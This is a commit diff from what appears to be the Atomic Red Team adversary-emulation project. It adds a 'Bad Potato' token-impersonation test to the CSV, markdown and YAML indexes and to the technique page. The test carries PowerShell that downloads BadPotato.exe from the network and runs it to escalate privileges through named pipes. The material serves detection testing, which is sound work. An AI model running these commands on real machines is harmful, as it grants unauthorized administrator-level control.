Generated docs from job=generate-docs branch=master [ci skip]

2022-08-31 20:23:43 +00:00
parent dab5a0fbaf
commit 2d9e41f1bf
8 changed files with 123 additions and 2 deletions
@@ -263,6 +263,7 @@ defense-evasion,T1218.005,Mshta,10,Mshta used to Execute PowerShell,8707a805-2b7
 defense-evasion,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
 defense-evasion,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
 defense-evasion,T1134.001,Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
+defense-evasion,T1134.001,Token Impersonation/Theft,4,Bad Potato,9c6d799b-c111-4749-a42f-ec2f8cb51448,powershell
 defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
 defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
 defense-evasion,T1564.002,Hidden Users,3,Create Hidden User in Registry,173126b7-afe4-45eb-8680-fa9f6400431c,command_prompt
@@ -522,6 +523,7 @@ privilege-escalation,T1547.015,Login Items,1,Persistence by modifying Windows Te
 privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
 privilege-escalation,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
 privilege-escalation,T1134.001,Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
+privilege-escalation,T1134.001,Token Impersonation/Theft,4,Bad Potato,9c6d799b-c111-4749-a42f-ec2f8cb51448,powershell
 privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
 privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
 privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,3,Windows MOFComp.exe Load MOF File,29786d7e-8916-4de6-9c55-be7b093b2706,powershell
@@ -197,6 +197,7 @@ defense-evasion,T1218.005,Mshta,10,Mshta used to Execute PowerShell,8707a805-2b7
 defense-evasion,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
 defense-evasion,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
 defense-evasion,T1134.001,Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
+defense-evasion,T1134.001,Token Impersonation/Theft,4,Bad Potato,9c6d799b-c111-4749-a42f-ec2f8cb51448,powershell
 defense-evasion,T1564.002,Hidden Users,3,Create Hidden User in Registry,173126b7-afe4-45eb-8680-fa9f6400431c,command_prompt
 defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
 defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
@@ -385,6 +386,7 @@ privilege-escalation,T1546.009,AppCert DLLs,1,Create registry persistence via Ap
 privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
 privilege-escalation,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
 privilege-escalation,T1134.001,Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
+privilege-escalation,T1134.001,Token Impersonation/Theft,4,Bad Potato,9c6d799b-c111-4749-a42f-ec2f8cb51448,powershell
 privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
 privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
 privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,3,Windows MOFComp.exe Load MOF File,29786d7e-8916-4de6-9c55-be7b093b2706,powershell
@@ -383,6 +383,7 @@
  - Atomic Test #1: Named pipe client impersonation [windows]
  - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
  - Atomic Test #3: Launch NSudo Executable [windows]
+  - Atomic Test #4: Bad Potato [windows]
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1564.002 Hidden Users](../../T1564.002/T1564.002.md)
  - Atomic Test #1: Create Hidden User using UniqueID < 500 [macos]
@@ -807,6 +808,7 @@
  - Atomic Test #1: Named pipe client impersonation [windows]
  - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
  - Atomic Test #3: Launch NSudo Executable [windows]
+  - Atomic Test #4: Bad Potato [windows]
 - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1053.004 Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
@@ -291,6 +291,7 @@
  - Atomic Test #1: Named pipe client impersonation [windows]
  - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
  - Atomic Test #3: Launch NSudo Executable [windows]
+  - Atomic Test #4: Bad Potato [windows]
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1564.002 Hidden Users](../../T1564.002/T1564.002.md)
  - Atomic Test #3: Create Hidden User in Registry [windows]
@@ -604,6 +605,7 @@
  - Atomic Test #1: Named pipe client impersonation [windows]
  - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
  - Atomic Test #3: Launch NSudo Executable [windows]
+  - Atomic Test #4: Bad Potato [windows]
 - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
  - Atomic Test #1: Persistence via WMI Event Subscription - CommandLineEventConsumer [windows]
@@ -15313,6 +15313,37 @@ defense-evasion:
          Start-Sleep -Second 5
          Stop-Process -Name "cmd" -force -erroraction silentlycontinue
        name: powershell
+    - name: Bad Potato
+      auto_generated_guid: 9c6d799b-c111-4749-a42f-ec2f8cb51448
+      description: |-
+        https://github.com/BeichenDream/BadPotato
+        Privilege escalation using named pipe connections
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'BadPotato.exe must exist in the temp directory
+
+          '
+        prereq_command: 'if (Test-Path $env:temp\BadPotato.exe) {exit 0} else {exit
+          1}
+
+          '
+        get_prereq_command: 'Invoke-WebRequest -OutFile $env:TEMP\BadPotato.exe "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/bin/BadPotato.exe?raw=true"
+
+          '
+      executor:
+        command: |
+          cd $env:temp
+          Start-Process .\BadPotato.exe notepad.exe
+          Start-Sleep -Second 20
+          Stop-Process -Name "notepad" -force -erroraction silentlycontinue
+          Stop-Process -Name "BadPotato" -force -erroraction silentlycontinue
+        cleanup_command: 'taskkill /f /im notepad.exe
+
+          '
+        name: powershell
+        elevation_required: true
  T1205.001:
    technique:
      x_mitre_platforms:
@@ -34673,6 +34704,37 @@ privilege-escalation:
          Start-Sleep -Second 5
          Stop-Process -Name "cmd" -force -erroraction silentlycontinue
        name: powershell
+    - name: Bad Potato
+      auto_generated_guid: 9c6d799b-c111-4749-a42f-ec2f8cb51448
+      description: |-
+        https://github.com/BeichenDream/BadPotato
+        Privilege escalation using named pipe connections
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'BadPotato.exe must exist in the temp directory
+
+          '
+        prereq_command: 'if (Test-Path $env:temp\BadPotato.exe) {exit 0} else {exit
+          1}
+
+          '
+        get_prereq_command: 'Invoke-WebRequest -OutFile $env:TEMP\BadPotato.exe "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/bin/BadPotato.exe?raw=true"
+
+          '
+      executor:
+        command: |
+          cd $env:temp
+          Start-Process .\BadPotato.exe notepad.exe
+          Start-Sleep -Second 20
+          Stop-Process -Name "notepad" -force -erroraction silentlycontinue
+          Stop-Process -Name "BadPotato" -force -erroraction silentlycontinue
+        cleanup_command: 'taskkill /f /im notepad.exe
+
+          '
+        name: powershell
+        elevation_required: true
  T1134.003:
    technique:
      x_mitre_platforms:
@@ -12,6 +12,8 @@ An adversary may do this when they have a specific, existing process they want t

 - [Atomic Test #3 - Launch NSudo Executable](#atomic-test-3---launch-nsudo-executable)

+- [Atomic Test #4 - Bad Potato](#atomic-test-4---bad-potato)
+

 <br/>

@@ -125,4 +127,53 @@ Remove-Item $env:TEMP\NSudo_8.2_All_Components.zip -Recurse -ErrorAction Ignore



+<br/>
+<br/>
+
+## Atomic Test #4 - Bad Potato
+https://github.com/BeichenDream/BadPotato
+Privilege escalation using named pipe connections
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 9c6d799b-c111-4749-a42f-ec2f8cb51448
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+cd $env:temp
+Start-Process .\BadPotato.exe notepad.exe
+Start-Sleep -Second 20
+Stop-Process -Name "notepad" -force -erroraction silentlycontinue
+Stop-Process -Name "BadPotato" -force -erroraction silentlycontinue
+```
+
+#### Cleanup Commands:
+```powershell
+taskkill /f /im notepad.exe
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: BadPotato.exe must exist in the temp directory
+##### Check Prereq Commands:
+```powershell
+if (Test-Path $env:temp\BadPotato.exe) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest -OutFile $env:TEMP\BadPotato.exe "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/bin/BadPotato.exe?raw=true"
+```
+
+
+
+
 <br/>